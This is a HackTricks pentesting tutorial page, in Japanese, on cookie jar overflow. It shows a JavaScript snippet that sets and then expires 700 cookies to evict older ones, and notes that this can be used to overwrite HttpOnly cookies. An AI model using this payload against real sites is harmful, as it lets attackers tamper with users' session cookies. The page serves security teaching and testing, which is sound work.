hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

3.6 KiB
Raw Blame History

ゼロからヒーローまでAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricksをサポートする他の方法

ブラウザはページごとに保存できるCookieの数に制限があります。そのため、何らかの理由でCookieを消去する必要がある場合は、最も古いCookieが削除される前にCookieジャーをオーバーフローさせることができます。

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

注意:異なるドメインを指すサードパーティークッキーは上書きされません。

{% hint style="danger" %} この攻撃は、HttpOnlyクッキーを上書きするために使用することもできます。削除してから、希望する値でリセットできます

このラボを含むこの投稿をチェックしてください。 {% endhint %}

**htARTEHackTricks AWS Red Team Expert**でAWSハッキングをゼロからヒーローまで学ぶ こちら

HackTricksをサポートする他の方法